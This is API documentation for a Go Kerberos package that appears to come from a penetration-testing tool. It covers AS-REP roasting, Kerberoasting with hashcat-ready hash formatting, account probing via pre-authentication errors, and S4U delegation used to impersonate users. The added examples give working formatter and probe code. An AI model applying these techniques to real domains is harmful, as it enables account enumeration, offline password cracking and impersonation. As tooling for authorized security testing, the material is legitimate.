Documentation
Index
- Constants
- func BuildASReq(realm, principal string, cfg *config.Config) (messages.ASReq, error)
- func BuildTGSReqFromTGT(tgt messages.Ticket, sessionKey types.EncryptionKey, cname types.PrincipalName, ...) (messages.TGSReq, error)
- func ExtractTicketCipher(rep messages.TGSRep) (etype int32, cipher []byte)
- func FormatASRepHashcat(asrep messages.ASRep) string
- func FormatTGSRepHashcat(rep messages.TGSRep) string
- func HashcatModeForASRep(etype int32) (int, bool)
- func HashcatModeForTGSRep(etype int32) (int, bool)
- func KerberosEtypeFromString(name string) (int32, bool)
- func LoadCCacheFromBase64(b string) (*credentials.CCache, error)
- func LoadTGTFromCCache(cache *credentials.CCache, realm string) (tgt messages.Ticket, sessionKey types.EncryptionKey, ok bool)
- func LookupKrbErrName(code int32) string
- func SendASReqToKDC(host string, port int, asReq messages.ASReq, timeout time.Duration) (raw []byte, asRep *messages.ASRep, krbErr *messages.KRBError, err error)
- func SendTGSReqToKDC(host string, port int, tgsReq messages.TGSReq, timeout time.Duration) (raw []byte, tgsRep *messages.TGSRep, krbErr *messages.KRBError, err error)
- func WriteCCacheToFile(cache *credentials.CCache, path string) error
- type ClientManager
- type S4UManager
- type Target
- type TicketInfo
- type TicketManager
- func (tm *TicketManager) GenerateTicketBase64(impersonateUser, userDomain, spn string) (string, error)
- func (tm *TicketManager) GetTGT(userDomain string) (messages.Ticket, types.EncryptionKey, error)
- func (tm *TicketManager) RequestServiceTicket(ctx context.Context, requestingUser, userDomain, impersonateUser, spn string) (*TicketInfo, error)
Constants
const (
	// AS-REP roast (krb5asrep). Only the RC4 (etype 23) AS-REP mode is emitted
	// by this package; hashcat's AES AS-REP modes are not formatted here.
	HashcatModeASRepRoastRC4 = 18200

	// Kerberoast (krb5tgs), selected per ticket etype.
	HashcatModeKerberoastRC4    = 13100 // etype 23
	HashcatModeKerberoastAES128 = 19600 // etype 17
	HashcatModeKerberoastAES256 = 19700 // etype 18
)
Hashcat mode constants for each (operation, etype) pair. Hashcat has no single "kerberoast" or "AS-REP roast" mode: the mode is selected by both the attack and the ticket's encryption type, and a hash loaded under the wrong mode is silently uncrackable (hashcat accepts the line and simply never recovers the password). Current hashcat releases also ship AS-REP modes for the AES etypes, 32100 (etype 17) and 32200 (etype 18); this package does not emit them and returns no mode for an AES AS-REP.
Reference: https://hashcat.net/wiki/doku.php?id=example_hashes
Variables
This section is empty.
Functions
func BuildASReq added in v0.0.190
func BuildASReq(realm, principal string, cfg *config.Config) (messages.ASReq, error)
BuildASReq builds a raw AS-REQ for the given realm and principal. The raw primitive always omits PA-ENC-TIMESTAMP, so the KDC answers one of two ways: KDC_ERR_PREAUTH_REQUIRED for accounts with pre-authentication enabled (the probe signal, which also confirms that the account exists), or an AS-REP for accounts with pre-authentication disabled (the AS-REP-roast condition: that AS-REP's enc-part is encrypted under the user's long-term key and can be cracked offline). Callers that need a real PA-ENC-TIMESTAMP must go through gokrb5's client.ASExchange path, which encrypts the timestamp with the principal's key material; that is not modeled here because the raw primitive is intentionally credential-free.
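The decision this probe sets up, as an added example that is not part of the package (the package parses replies with gokrb5's messages types; this stand-alone Go code uses only the standard library): a minimal DER walker pulls the error-code out of a KRB-ERROR, and ProbeVerdict maps the reply to the outcomes a credential-free AS-REQ can produce. The helper names (readTLV, KRBErrorCode, ProbeVerdict, SampleKRBError, probeErrNames) are illustrative, the KRB-ERROR bytes are constructed inline rather than captured from a KDC, and the AS-REP check looks only at the outer [APPLICATION 11] tag.

```go
package main

import (
	"errors"
	"fmt"
)

// Outer DER tags: AS-REP is [APPLICATION 11] (0x6b), KRB-ERROR is [APPLICATION 30] (0x7e).
const tagASRep, tagKRBError byte = 0x6b, 0x7e

// KRB-ERROR codes that matter for the credential-free AS-REQ probe (RFC 4120 §7.5.9).
const KDCErrCPrincipalUnknown, KDCErrPreauthRequired = 6, 25

var probeErrNames = map[int]string{
	KDCErrCPrincipalUnknown: "KDC_ERR_C_PRINCIPAL_UNKNOWN: no such principal",
	18:                      "KDC_ERR_CLIENT_REVOKED: account disabled or locked",
	KDCErrPreauthRequired:   "KDC_ERR_PREAUTH_REQUIRED: account exists, pre-auth enforced",
}

// readTLV splits one DER tag-length-value off the front of b (long-form lengths up to 3 bytes).
func readTLV(b []byte) (tag byte, val, rest []byte, err error) {
	if len(b) < 2 {
		return 0, nil, nil, errors.New("short TLV")
	}
	tag, l, i := b[0], int(b[1]), 2
	if n := l & 0x7f; l&0x80 != 0 {
		if n == 0 || n > 3 || len(b) < 2+n {
			return 0, nil, nil, errors.New("unsupported DER length")
		}
		for l = 0; i < 2+n; i++ {
			l = l<<8 | int(b[i])
		}
	}
	if len(b) < i+l {
		return 0, nil, nil, errors.New("truncated DER value")
	}
	return tag, b[i : i+l], b[i+l:], nil
}

// KRBErrorCode walks a KRB-ERROR and returns its [6] error-code INTEGER
// (RFC 4120 §5.9.1), skipping every other field.
func KRBErrorCode(der []byte) (int, error) {
	tag, body, _, err := readTLV(der)
	if err != nil || tag != tagKRBError {
		return 0, errors.New("not a KRB-ERROR")
	}
	st, seq, _, err := readTLV(body)
	if err != nil || st != 0x30 {
		return 0, errors.New("KRB-ERROR body is not a SEQUENCE")
	}
	for len(seq) > 0 {
		ct, cv, rest, err := readTLV(seq)
		if err != nil {
			return 0, err
		}
		if ct == 0xa6 { // [6] is EXPLICIT: the INTEGER sits inside it
			it, iv, _, err := readTLV(cv)
			if err != nil || it != 0x02 || len(iv) == 0 || len(iv) > 4 {
				return 0, errors.New("malformed error-code")
			}
			code := 0 // error-codes are small non-negative INTEGERs
			for _, c := range iv {
				code = code<<8 | int(c)
			}
			return code, nil
		}
		seq = rest
	}
	return 0, errors.New("KRB-ERROR without error-code")
}

// ProbeVerdict interprets the reply to an AS-REQ sent without PA-ENC-TIMESTAMP.
func ProbeVerdict(reply []byte) (string, error) {
	if len(reply) > 0 && reply[0] == tagASRep {
		return "AS-REP: pre-auth not required, AS-REP roastable", nil
	}
	code, err := KRBErrorCode(reply)
	if err != nil {
		return "", err
	}
	if name, ok := probeErrNames[code]; ok {
		return name, nil
	}
	return fmt.Sprintf("KRB-ERROR error-code %d", code), nil
}

// tlv is a short-form DER encoder used only to build the constructed sample below.
func tlv(tag byte, body []byte) []byte { return append([]byte{tag, byte(len(body))}, body...) }

// SampleKRBError builds a constructed KRB-ERROR (not a capture) with pvno,
// msg-type, stime, susec, error-code (< 128) and realm.
func SampleKRBError(code int) []byte {
	intv := func(v int) []byte { return tlv(0x02, []byte{byte(v)}) }
	var seq []byte
	for _, f := range [][]byte{tlv(0xa0, intv(5)), tlv(0xa1, intv(30)),
		tlv(0xa4, tlv(0x18, []byte("20240101000000Z"))), tlv(0xa5, intv(0)),
		tlv(0xa6, intv(code)), tlv(0xa9, tlv(0x1b, []byte("EXAMPLE.COM")))} {
		seq = append(seq, f...)
	}
	return tlv(tagKRBError, tlv(0x30, seq))
}

func main() {
	v, err := ProbeVerdict(SampleKRBError(KDCErrPreauthRequired))
	fmt.Println(v, err)
}
```

KRBErrorCode deliberately ignores every field except error-code, so it still works on a KRB-ERROR whose optional fields (crealm, cname, e-text, e-data) are present or absent; a real tool would additionally read e-data, which carries the KDC's offered etypes when error-code is 25.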
func BuildTGSReqFromTGT added in v0.0.190
func BuildTGSReqFromTGT(tgt messages.Ticket, sessionKey types.EncryptionKey, cname types.PrincipalName, realm, spn string, cfg *config.Config) (messages.TGSReq, error)
BuildTGSReqFromTGT builds a TGS-REQ for the specified SPN using an existing TGT and its session key.
func ExtractTicketCipher added in v0.0.190
func ExtractTicketCipher(rep messages.TGSRep) (etype int32, cipher []byte)
ExtractTicketCipher extracts the encryption type and cipher of the ticket's enc-part from a TGS-REP, for hashcat formatting.
func FormatASRepHashcat added in v0.0.190
func FormatASRepHashcat(asrep messages.ASRep) string
FormatASRepHashcat formats an AS-REP response in hashcat $krb5asrep$ format. Returns the empty string if the cipher is too short to format (< 16 bytes) or if the etype is not RC4 (etype 23), the only AS-REP etype this package emits a mode for. Layout: $krb5asrep$23$<user>@<realm>:<checksum[:16]>$<edata[16:]>, with the RC4 checksum first, as for mode 13100. Format reference: hashcat example_hashes.txt mode 18200.
func FormatTGSRepHashcat added in v0.0.190
func FormatTGSRepHashcat(rep messages.TGSRep) string
FormatTGSRepHashcat formats a TGS-REP in hashcat $krb5tgs$ format. Returns the empty string if the ticket cipher is too short or if the etype is not one of the kerberoast etypes hashcat supports (23, 17, 18).
Layouts (cross-checked against impacket GetUserSPNs.py and Rubeus):
- RC4 (13100): $krb5tgs$23$*<svcName>$<realm>$<spn>*$<checksum[:16]>$<edata[16:]> The checksum is the FIRST 16 bytes of the cipher (RFC 4757 layout: HMAC-MD5 checksum, then the encrypted confounder and data).
- AES128 (19600) / AES256 (19700): $krb5tgs$<etype>$<svcName>$<realm>$*<spn>*$<HMAC[-12:]>$<edata[:-12]> The HMAC-SHA1-96 is the LAST 12 bytes of the cipher (RFC 3962 layout). The asterisks wrap the SPN; both impacket and Rubeus emit this shape and hashcat parses it.
The <svcName> field is taken from the ticket's SName (the service account identifier as presented to hashcat). For the AES modes this name is part of the key-derivation salt (the uppercase realm followed by the account name), so it MUST identify the service account, not the authenticating user, and it must match the sAMAccountName exactly, case included. When the SAM account name is not independently known (i.e. the TGS-REP was obtained without LDAP enumeration), embedding the SPN itself is the fallback used here; it is the same behaviour as impacket GetUserSPNs.py and Rubeus when no account mapping is available. Because the salt is then wrong, such an AES hash cannot crack until the field is replaced with the real sAMAccountName; RC4 (13100) keys are unsalted, so the RC4 layout is unaffected by a wrong name.
An earlier layout that lived here ("AES is one blob with no asterisks") loaded into hashcat as garbage: AES kerberoasts looked successful in the report but never cracked. Spotted by Bugbot round-8.
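The two layouts above and the mode selection under Constants, as one added example that is not the package's own code (it takes raw bytes and strings rather than gokrb5 messages types): it formats a constructed cipher for etypes 23 and 18, formats an RC4 AS-REP, and re-parses the $krb5tgs$ line to catch the checksum-width mismatch that would otherwise load into hashcat silently. The function names, the account svc_sql, the realm EXAMPLE.COM and the SPN are illustrative, and the cipher bytes are constructed, not a real ticket.

```go
package main

import (
	"encoding/hex"
	"fmt"
	"strconv"
	"strings"
)

// Kerberos etype numbers: 17/18 from RFC 3962, 23 from RFC 4757.
const (
	EtypeAES128 int32 = 17
	EtypeAES256 int32 = 18
	EtypeRC4    int32 = 23
)

// HashcatMode picks the mode from both the operation and the etype; there is no
// single "kerberoast" or "AS-REP roast" mode. Only the RC4 AS-REP mode is emitted here.
func HashcatMode(asrep bool, etype int32) (int, bool) {
	switch {
	case asrep && etype == EtypeRC4:
		return 18200, true
	case asrep:
		return 0, false
	case etype == EtypeRC4:
		return 13100, true
	case etype == EtypeAES128:
		return 19600, true
	case etype == EtypeAES256:
		return 19700, true
	}
	return 0, false
}

// FormatTGSRep lays out a service ticket's EncryptedData.cipher for hashcat.
// svcName should be the service account's sAMAccountName: for AES it is part of
// the PBKDF2 salt, so a wrong name yields a line that loads but never cracks.
func FormatTGSRep(etype int32, svcName, realm, spn string, cipher []byte) string {
	switch etype {
	case EtypeRC4:
		// RFC 4757: the 16-byte HMAC-MD5 checksum comes FIRST, then confounder||data.
		if len(cipher) <= 16 {
			return ""
		}
		return fmt.Sprintf("$krb5tgs$23$*%s$%s$%s*$%x$%x", svcName, realm, spn, cipher[:16], cipher[16:])
	case EtypeAES128, EtypeAES256:
		// RFC 3962: the 12-byte HMAC-SHA1-96 comes LAST; hashcat wants it before the data.
		if len(cipher) <= 12 {
			return ""
		}
		n := len(cipher) - 12
		return fmt.Sprintf("$krb5tgs$%d$%s$%s$*%s*$%x$%x", etype, svcName, realm, spn, cipher[n:], cipher[:n])
	}
	return "" // no hashcat kerberoast mode for this etype (e.g. DES)
}

// FormatASRep lays out an AS-REP enc-part for mode 18200 (user@REALM:checksum$data).
func FormatASRep(etype int32, user, realm string, cipher []byte) string {
	if etype != EtypeRC4 || len(cipher) <= 16 {
		return ""
	}
	return fmt.Sprintf("$krb5asrep$23$%s@%s:%x$%x", user, realm, cipher[:16], cipher[16:])
}

// CheckTGSLine re-parses a $krb5tgs$ line and verifies the checksum field has
// the width the mode for its etype expects (32 hex chars for RC4, 24 for AES).
func CheckTGSLine(line string) (etype int32, mode int, err error) {
	parts := strings.Split(line, "$")
	if len(parts) < 8 || parts[1] != "krb5tgs" {
		return 0, 0, fmt.Errorf("not a $krb5tgs$ line")
	}
	e, err := strconv.Atoi(parts[2])
	if err != nil {
		return 0, 0, fmt.Errorf("bad etype field %q", parts[2])
	}
	etype = int32(e)
	mode, ok := HashcatMode(false, etype)
	if !ok {
		return etype, 0, fmt.Errorf("no hashcat mode for etype %d", etype)
	}
	want := 24
	if etype == EtypeRC4 {
		want = 32
	}
	cs, data := parts[len(parts)-2], parts[len(parts)-1]
	if len(cs) != want {
		return etype, mode, fmt.Errorf("checksum is %d hex chars, mode %d expects %d", len(cs), mode, want)
	}
	if _, err := hex.DecodeString(cs + data); err != nil {
		return etype, mode, fmt.Errorf("non-hex checksum or cipher: %v", err)
	}
	return etype, mode, nil
}

func main() {
	cipher := []byte("0123456789abcdefghijklmnopqrstuvwxyz") // constructed, not a real ticket
	line := FormatTGSRep(EtypeAES256, "svc_sql", "EXAMPLE.COM", "MSSQLSvc/db01.example.com:1433", cipher)
	_, mode, err := CheckTGSLine(line)
	fmt.Printf("hashcat -m %d  %s  (check: %v)\n", mode, line, err)
}
```

Running CheckTGSLine over every line before handing a file to hashcat is the cheap guard against the failure mode described above: a 32-character checksum under an etype 17 or 18 header, or a 24-character one under etype 23, is rejected here rather than sitting in a cracking job that can never succeed.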
func HashcatModeForASRep added in v0.0.190
func HashcatModeForASRep(etype int32) (int, bool)
HashcatModeForASRep returns the hashcat mode for an AS-REP roast hash of the given etype, or (0, false) if this package has no mode for it. Only RC4 (etype 23, mode 18200) is supported for AS-REP roast.
func HashcatModeForTGSRep added in v0.0.190
func HashcatModeForTGSRep(etype int32) (int, bool)
HashcatModeForTGSRep returns the hashcat mode for a kerberoast hash of the given TGS ticket etype, or (0, false) if hashcat has no mode for it.
func KerberosEtypeFromString added in v0.0.190
func KerberosEtypeFromString(name string) (int32, bool)
KerberosEtypeFromString maps a KerberosEncryptionType string to the gokrb5 etype ID, returning false if the name is unknown.
func LoadCCacheFromBase64 added in v0.0.190
func LoadCCacheFromBase64(b string) (*credentials.CCache, error)
LoadCCacheFromBase64 decodes a base64-encoded CCache and unmarshals it.
func LoadTGTFromCCache added in v0.0.190
func LoadTGTFromCCache(cache *credentials.CCache, realm string) (tgt messages.Ticket, sessionKey types.EncryptionKey, ok bool)
LoadTGTFromCCache walks a CCache looking for the krbtgt entry for the given realm. It returns the TGT ticket, its session key and ok == true if found; otherwise ok is false.
func LookupKrbErrName added in v0.0.190
func LookupKrbErrName(code int32) string
LookupKrbErrName returns the symbolic name for a KDC error code. It uses gokrb5's iana/errorcode.Lookup function, which returns a full description string; this function extracts just the symbolic-name prefix.
func SendASReqToKDC added in v0.0.190
func SendASReqToKDC(host string, port int, asReq messages.ASReq, timeout time.Duration) (raw []byte, asRep *messages.ASRep, krbErr *messages.KRBError, err error)
SendASReqToKDC sends an AS-REQ to the KDC over TCP and returns the raw response bytes, the parsed AS-REP (if one was received), the parsed KRB-ERROR (if one was received), and any network or parse error. Callers dispatch on which of asRep and krbErr is non-nil. Wire format: a 4-byte big-endian length prefix followed by the DER message body (RFC 4120 §7.2.2); the request is framed the same way.
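The framing described here, as an added stand-alone example that is not the package's SendASReqToKDC (which takes a gokrb5 messages.ASReq and returns parsed types): a writer and reader for the length-prefixed TCP transport, with the length checks a client should apply before allocating, and a net.Pipe stand-in for the KDC so the exchange runs offline. The names (WriteKrbTCP, ReadKrbTCP, Exchange, FakeKDC, RoundTrip), the 64 KiB maxKDCReply cap, and the two stubs (outer tag plus an empty SEQUENCE, not real messages) are this example's assumptions.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
	"io"
	"net"
	"time"
)

// maxKDCReply caps what we will allocate for one reply; real KDC replies are a few KB.
const maxKDCReply = 1 << 16

// WriteKrbTCP frames msg per RFC 4120 §7.2.2: 4-byte big-endian length, then the DER body.
func WriteKrbTCP(w io.Writer, msg []byte) error {
	var hdr [4]byte
	binary.BigEndian.PutUint32(hdr[:], uint32(len(msg)))
	_, err := w.Write(append(hdr[:], msg...))
	return err
}

// ReadKrbTCP reads one framed message. §7.2.2 reserves the high bit of the length,
// so it is rejected along with zero-length and oversized frames, before any allocation.
func ReadKrbTCP(r io.Reader, max uint32) ([]byte, error) {
	var hdr [4]byte
	if _, err := io.ReadFull(r, hdr[:]); err != nil {
		return nil, fmt.Errorf("reading length prefix: %w", err)
	}
	n := binary.BigEndian.Uint32(hdr[:])
	if n&0x80000000 != 0 || n == 0 || n > max {
		return nil, fmt.Errorf("refusing frame with length 0x%08x", n)
	}
	body := make([]byte, n)
	if _, err := io.ReadFull(r, body); err != nil {
		return nil, fmt.Errorf("reading %d-byte body: %w", n, err)
	}
	return body, nil
}

// Exchange is the client side after net.Dial: write one framed request, read one
// framed reply under a deadline, and hand back the raw DER. The first byte tells
// the caller which message came back (0x6b AS-REP, 0x7e KRB-ERROR).
func Exchange(conn net.Conn, req []byte, timeout time.Duration) ([]byte, error) {
	if err := conn.SetDeadline(time.Now().Add(timeout)); err != nil {
		return nil, err
	}
	if err := WriteKrbTCP(conn, req); err != nil {
		return nil, err
	}
	return ReadKrbTCP(conn, maxKDCReply)
}

// FakeKDC serves one request on kdc and answers with reply, so the exchange can
// be exercised without a domain controller. It closes kdc when done.
func FakeKDC(kdc net.Conn, reply []byte) {
	defer kdc.Close()
	if _, err := ReadKrbTCP(kdc, maxKDCReply); err == nil {
		_ = WriteKrbTCP(kdc, reply)
	}
}

// Placeholder messages (constructed, not captures): outer tag plus an empty SEQUENCE.
var (
	asReqStub    = []byte{0x6a, 0x02, 0x30, 0x00} // AS-REQ    [APPLICATION 10]
	krbErrorStub = []byte{0x7e, 0x02, 0x30, 0x00} // KRB-ERROR [APPLICATION 30]
)

// RoundTrip runs one exchange over an in-memory pipe and returns the raw reply.
func RoundTrip(req, reply []byte) ([]byte, error) {
	client, kdc := net.Pipe()
	go FakeKDC(kdc, reply)
	defer client.Close()
	return Exchange(client, req, 2*time.Second)
}

func main() {
	raw, err := RoundTrip(asReqStub, krbErrorStub)
	fmt.Printf("reply=%x err=%v\n", raw, err)
	// A hostile or broken peer sending a bogus length is refused before allocation.
	_, err = ReadKrbTCP(bytes.NewReader([]byte{0x80, 0, 0, 1}), maxKDCReply)
	fmt.Println(err)
}
```

The length check matters because the prefix is attacker-controlled when the "KDC" is whatever answered on port 88: without the cap, a single frame header can make the client allocate up to 2 GiB before a byte of body arrives.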
func SendTGSReqToKDC added in v0.0.190
func SendTGSReqToKDC(host string, port int, tgsReq messages.TGSReq, timeout time.Duration) (raw []byte, tgsRep *messages.TGSRep, krbErr *messages.KRBError, err error)
SendTGSReqToKDC sends a TGS-REQ to the KDC over TCP, using the same length-prefixed framing as SendASReqToKDC, and returns the raw response bytes, the parsed TGS-REP (if one was received), the parsed KRB-ERROR (if one was received), and any network or parse error.
func WriteCCacheToFile added in v0.0.190
func WriteCCacheToFile(cache *credentials.CCache, path string) error
WriteCCacheToFile marshals the CCache and writes it to the given path with mode 0600 (owner read/write only). A ccache holds live tickets and their session keys, so it must never be readable by other users on the host.
Types
type ClientManager
type ClientManager struct {
Config *config.Config
Target *Target
// contains filtered or unexported fields
}
ClientManager handles Kerberos client configuration and creation.
func NewClientManager
func NewClientManager(target *Target) *ClientManager
NewClientManager creates a new Kerberos client manager for the target.
func (*ClientManager) CreateClientFromConfig
func (kcm *ClientManager) CreateClientFromConfig(pentestConfig *kerberosfern.PentestKerberosConfig) (*client.Client, string, error)
CreateClientFromConfig creates a Kerberos client from the provided pentest config.
func (*ClientManager) CreateConfiguration
func (kcm *ClientManager) CreateConfiguration() *config.Config
CreateConfiguration creates a gokrb5 Kerberos configuration for the target.
func (*ClientManager) WithEtypes added in v0.0.190
func (kcm *ClientManager) WithEtypes(etypes []int32) *ClientManager
WithEtypes sets the etype preference order used by the next CreateConfiguration call; call it before CreateConfiguration. Pass nil or an empty slice to use the defaults. The order offered here decides which etype the KDC uses for the returned ticket, and therefore which hashcat mode the resulting hash needs.
type S4UManager
S4UManager handles Service for User (S4U) operations for Kerberos delegation.
func NewS4UManager
func NewS4UManager(client *client.Client, config *config.Config) *S4UManager
NewS4UManager creates a new S4U manager.
func (*S4UManager) PerformS4U2Proxy
func (s4u *S4UManager) PerformS4U2Proxy(ctx context.Context, requestingUser, userDomain, impersonateUser string, tgt, s4u2SelfTicket messages.Ticket, sessionKey types.EncryptionKey, spn string) (messages.Ticket, error)
PerformS4U2Proxy performs S4U2Proxy to obtain a service ticket for the target SPN in the name of impersonateUser, presenting the S4U2Self ticket as the evidence ticket. It returns the delegated service ticket (the SPN ticket, NOT the S4U2Self ticket) so callers can serialize it into a ccache / ticketBase64 and report the real SPN principal and encryption type instead of the impersonation token's metadata.
func (*S4UManager) PerformS4U2Self
func (s4u *S4UManager) PerformS4U2Self(ctx context.Context, requestingUser, userDomain, impersonateUser string, tgt messages.Ticket, sessionKey types.EncryptionKey) (messages.Ticket, error)
PerformS4U2Self performs S4U2Self to obtain a service ticket to the requesting service in the name of the impersonated user; no credentials of that user are needed. The returned ticket is the evidence ticket consumed by PerformS4U2Proxy.
type Target
Target represents a parsed Kerberos target.
func ParseTarget
ParseTarget parses a target string into a Target. For IP addresses the domain is left empty, so callers must supply the realm via --domain when targeting an IP.
type TicketInfo added in v0.0.83
type TicketInfo struct {
Base64 string
Principal string
Realm string
// Enhanced ticket metadata
ServicePrincipal *string
StartTime *time.Time
EndTime *time.Time
RenewUntil *time.Time
TicketFlags *string
EncryptionType *string
KeyVersionNumber *int
Algorithm *string
TicketVersionNumber *int
}
TicketInfo contains information extracted from a Kerberos ticket
type TicketManager
TicketManager handles Kerberos ticket operations.
func NewTicketManager
func NewTicketManager(client *client.Client, config *config.Config) *TicketManager
NewTicketManager creates a new ticket manager.
func (*TicketManager) GenerateTicketBase64
func (tm *TicketManager) GenerateTicketBase64(impersonateUser, userDomain, spn string) (string, error)
GenerateTicketBase64 returns the acquired ticket as a base64-encoded ccache.
func (*TicketManager) GetTGT
func (tm *TicketManager) GetTGT(userDomain string) (messages.Ticket, types.EncryptionKey, error)
GetTGT retrieves a Ticket Granting Ticket for the specified domain, returning the ticket and its session key.
func (*TicketManager) RequestServiceTicket
func (tm *TicketManager) RequestServiceTicket(ctx context.Context, requestingUser, userDomain, impersonateUser, spn string) (*TicketInfo, error)
RequestServiceTicket acquires a service ticket for spn, optionally through S4U2Self and S4U2Proxy to impersonate impersonateUser.